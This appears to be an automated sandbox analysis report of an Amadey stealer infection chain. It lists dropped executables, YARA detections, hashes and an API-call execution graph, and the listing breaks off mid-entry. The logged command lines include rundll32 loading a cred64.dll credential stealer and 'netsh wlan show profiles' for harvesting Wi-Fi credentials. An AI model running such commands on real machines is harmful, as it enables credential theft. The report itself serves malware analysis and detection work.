                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1960,i,5587240117108389418,17388237419523249848,262144 /prefetch:8
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                        Start time:21:34:51
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
                                                                                                                                                                                                                                        Imagebase:0x770000
                                                                                                                                                                                                                                        File size:2'397'184 bytes
                                                                                                                                                                                                                                        MD5 hash:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                        Start time:21:34:59
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                                                                                                                                                                                                                        Imagebase:0xd50000
                                                                                                                                                                                                                                        File size:2'397'184 bytes
                                                                                                                                                                                                                                        MD5 hash:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                        Start time:21:35:00
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        Imagebase:0xa00000
                                                                                                                                                                                                                                        File size:1'954'304 bytes
                                                                                                                                                                                                                                        MD5 hash:3AB592D71455D47170AB784430AE8102
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002C.00000003.2631909972.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002C.00000002.3263497208.0000000000A01000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                        Start time:21:35:00
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        Imagebase:0x590000
                                                                                                                                                                                                                                        File size:1'910'784 bytes
                                                                                                                                                                                                                                        MD5 hash:169D873778A229BCB4F010F87930CB28
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002D.00000002.2674415512.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002D.00000003.2633330881.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                        Start time:21:35:05
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe"
                                                                                                                                                                                                                                        Imagebase:0x10000
                                                                                                                                                                                                                                        File size:329'352 bytes
                                                                                                                                                                                                                                        MD5 hash:1C7D0F34BB1D85B5D2C01367CC8F62EF
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                        Start time:21:35:05
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                                                                                                                                                                                                        Imagebase:0xd10000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                                        Start time:21:35:05
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:49
                                                                                                                                                                                                                                        Start time:21:35:05
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                                                                                                                                                                                                        Imagebase:0x7ff60c930000
                                                                                                                                                                                                                                        File size:71'680 bytes
                                                                                                                                                                                                                                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                        Start time:21:35:06
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                        Imagebase:0xfc0000
                                                                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                        Start time:21:35:06
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 12156 -ip 12156
                                                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                                        Start time:21:35:06
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 12156 -s 844
                                                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                        Start time:21:35:06
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:netsh wlan show profiles
                                                                                                                                                                                                                                        Imagebase:0x7ff78e2f0000
                                                                                                                                                                                                                                        File size:96'768 bytes
                                                                                                                                                                                                                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:54
                                                                                                                                                                                                                                        Start time:21:35:06
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:166
                                                                                                                                                                                                                                        Start time:21:35:48
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 05560D2E Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 55a86effc749b82ce9e27bedd2b35b59f5ae97e5e70125625b8f306b1d64e1aa
                                                                                                                                                                                                                                          • Instruction ID: 738a698a84847e1bbae60c88bf71b24d05d9012022381c6f8079fe5c5479a310
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55a86effc749b82ce9e27bedd2b35b59f5ae97e5e70125625b8f306b1d64e1aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB0121EF14C1A0BE6042C6416B5CAB66B7EF5D36703308E36F403D31A2E2945F4D51B1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05560D37 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 20999a6fd29aaa7d53e0ff80ab181e50feec4117db07e6ff30e9684ddf5c1b1e
                                                                                                                                                                                                                                          • Instruction ID: 319a19323d01ea6e7e6ae3a6e118ebd6e8b42a6e43ca84a11222ea304341e7ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20999a6fd29aaa7d53e0ff80ab181e50feec4117db07e6ff30e9684ddf5c1b1e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E1129FF04C290BEA002C6516A58AF66B7EF6C27707308E76F043E3193E3A45E0951B2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05560D70 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 695b2c5e1b42a1038bd00bc3ccaf5f7a8359cbb1bdab023b0fb2f57acfea4600
                                                                                                                                                                                                                                          • Instruction ID: f7fe4910d7e8dafe2ce9b63d1749294464714aa6f78dad7637801ebefffb6462
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 695b2c5e1b42a1038bd00bc3ccaf5f7a8359cbb1bdab023b0fb2f57acfea4600
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2001D1BF54C260BE6042C6816758AB67B7EF5C2A703308D37F403D31A2E2A49E0951B2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05560D86 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 589782ea50164dc96e0ca5647844aca4f4633a95561abab5a77b690d80494001
                                                                                                                                                                                                                                          • Instruction ID: 4477d62dd6389ff9e35013a85141625d0d7c623d334abe0220bb28a002b98e98
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 589782ea50164dc96e0ca5647844aca4f4633a95561abab5a77b690d80494001
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FF0AFFB548260BE6142C6816B5C9F67B7AF5C3A703308D76F443D3192E2A45A0961B2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05560D99 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 81793f8b953b829b7488ea430462e4162f093803676244158cca62ae31ad976d
                                                                                                                                                                                                                                          • Instruction ID: 69c3b28bbfa75ac250c4f5d0b2cebabe4e47bbcc2f402f8cc1d2d0d09a657c0d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81793f8b953b829b7488ea430462e4162f093803676244158cca62ae31ad976d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BF090EF54C2A0BE6042C281675CAF66B7EF5C35703308976F403D3152E2954F4E61B2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05560DFD Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1fa8d2c83e195b819cc515ca8ca5515a0e8d986a06222b1c556d2fa8c6863e45
                                                                                                                                                                                                                                          • Instruction ID: a12449bde395600d8c2b948998e230a0cdbe67f7ebbf9438d73cf31b1bac2f85
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fa8d2c83e195b819cc515ca8ca5515a0e8d986a06222b1c556d2fa8c6863e45
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F01CAF14C1B17E6046D5926B2C9B76B7EF5C3A703308D2BF043C2096E6985A4E60B2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05560DAD Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d1160ca4039b8f959debfad395607194514b5b9e16afe14027abae66fbab320c
                                                                                                                                                                                                                                          • Instruction ID: 071170af92d8e85fe5b45f931cd70dc0d8b0b4b700135329be0afc9d7b75495f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1160ca4039b8f959debfad395607194514b5b9e16afe14027abae66fbab320c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4F01CAF54C160BE6041C2826B289B66B7EF5C3A70370893BF403D2192E6954A4D61B2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05560DBE Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8b8a672389aeac187f3ac7bafc95d11529aee90415cc11bab77057fa8a0cecbb
                                                                                                                                                                                                                                          • Instruction ID: 74c55c1566fc1b0c5df70cb8db24ab86de6cb444896a5b98ad696727c6e6eca1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b8a672389aeac187f3ac7bafc95d11529aee90415cc11bab77057fa8a0cecbb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8E065AF14C1607E6041C1516B18DB76B7DF4C3A70331CC3BF443C2042E6948A0E6072
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05560DE9 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c75c7e5d264628b60cb37c865405b3ccca3f45a4e9ce5705c287b660cb7a27ff
                                                                                                                                                                                                                                          • Instruction ID: 7935b99bc8a43dc5933876e700c6f35efe10ce03c52de8007345f47ae4ea9414
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c75c7e5d264628b60cb37c865405b3ccca3f45a4e9ce5705c287b660cb7a27ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FE04FEF24C1647D7041E0827B58EFB6B6EE1C2A313B18837F442D2482E7D98E4E6172
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:9.2%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:9.2%
                                                                                                                                                                                                                                          Total number of Nodes:1645
                                                                                                                                                                                                                                          Total number of Limit Nodes:56
                                                                                                                                                                                                                                          execution_graph 13590 5ab099 13597 5aaf95 13590->13597 13592 5ab0e6 13609 5aaef8 13592->13609 13593 5ab0c1 Concurrency::details::_Reschedule_chore 13593->13592 13605 5ac38e 13593->13605 13596 5ab0fe 13598 5aafa1 Concurrency::details::_Reschedule_chore 13597->13598 13599 5abe8c GetSystemTimePreciseAsFileTime 13598->13599 13600 5aafd2 13598->13600 13601 5aafb6 13599->13601 13600->13593 13619 592a10 13601->13619 13603 5aafbc __Mtx_unlock 13604 592a10 13 API calls 13603->13604 13604->13600 13606 5ac3ac 13605->13606 13607 5ac39c TpCallbackUnloadDllOnCompletion 13605->13607 13606->13592 13607->13606 13610 5aaf04 Concurrency::details::_Reschedule_chore 13609->13610 13611 5abe8c GetSystemTimePreciseAsFileTime 13610->13611 13612 5aaf5e 13610->13612 13613 5aaf19 13611->13613 13612->13596 13614 592a10 13 API calls 13613->13614 13615 5aaf1f __Mtx_unlock 13614->13615 13616 592a10 13 API calls 13615->13616 13617 5aaf3c __Cnd_broadcast 13616->13617 13617->13612 13618 592a10 13 API calls 13617->13618 13618->13612 13620 592a1a 13619->13620 13621 592a1c 13619->13621 13620->13603 13622 5aba4a 13 API calls 13621->13622 13623 592a22 13622->13623 13624 5c308c ___std_exception_copy RtlAllocateHeap 13623->13624 13625 592a68 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13624->13625 13625->13603 12968 5c649b 12975 5c64a7 __cftof 12968->12975 12970 5c64d6 12971 5c64e5 12970->12971 12972 5c64f3 12970->12972 12973 5c6549 12 API calls 12971->12973 12990 5c616d 12972->12990 12976 5c64ef 12973->12976 12982 5c835f 12975->12982 12977 5c650d 12993 5c60cd 12977->12993 12981 5c6521 ___free_lconv_mon 12983 5c8364 __cftof 12982->12983 12986 5c836f ___std_exception_copy 12983->12986 13010 5ccda4 12983->13010 13007 5c5dcd 12986->13007 12987 5ccfd7 RtlAllocateHeap 12988 5ccfea __dosmaperr 12987->12988 12989 5c83a2 __cftof 12987->12989 12988->12970 12989->12987 12989->12988 13029 5c60ea 12990->13029 12992 5c617f 12992->12977 13065 5c601b 12993->13065 12995 5c60e5 12995->12981 12996 5c6549 12995->12996 12997 5c6574 __cftof 12996->12997 13004 5c6557 __dosmaperr ___std_exception_copy 12996->13004 12998 5c65b6 CreateFileW 12997->12998 13006 5c659a __dosmaperr ___std_exception_copy 12997->13006 12999 5c65e8 12998->12999 13000 5c65da 12998->13000 13097 5c6627 12999->13097 13083 5c66b1 GetFileType 13000->13083 13003 5c65e3 __cftof 13005 5c6619 FindCloseChangeNotification 13003->13005 13003->13006 13004->12981 13005->13006 13006->12981 13017 5c5ca7 13007->13017 13011 5ccdb0 __cftof 13010->13011 13012 5c5dcd __cftof 2 API calls 13011->13012 13013 5cce0c __cftof __dosmaperr ___std_exception_copy 13011->13013 13016 5ccf9e __cftof 13012->13016 13013->12986 13014 5ccfd7 RtlAllocateHeap 13015 5ccfea __dosmaperr 13014->13015 13014->13016 13015->12986 13016->13014 13016->13015 13019 5c5cb5 __cftof 13017->13019 13018 5c5d00 13018->12989 13019->13018 13022 5c5d0b 13019->13022 13027 5c9a72 GetPEB 13022->13027 13024 5c5d15 13025 5c5d1a GetPEB 13024->13025 13026 5c5d2a __cftof 13024->13026 13025->13026 13028 5c9a8c __cftof 13027->13028 13028->13024 13030 5c610a 13029->13030 13034 5c6101 13029->13034 13030->13034 13035 5cad6b 13030->13035 13034->12992 13036 5c6140 13035->13036 13037 5cad7e 13035->13037 13039 5cad98 13036->13039 13037->13036 13043 5ced1c 13037->13043 13040 5cadab 13039->13040 13041 5cadc0 13039->13041 13040->13041 13048 5cde22 13040->13048 13041->13034 13045 5ced28 __cftof 13043->13045 13044 5ced77 13044->13036 13045->13044 13046 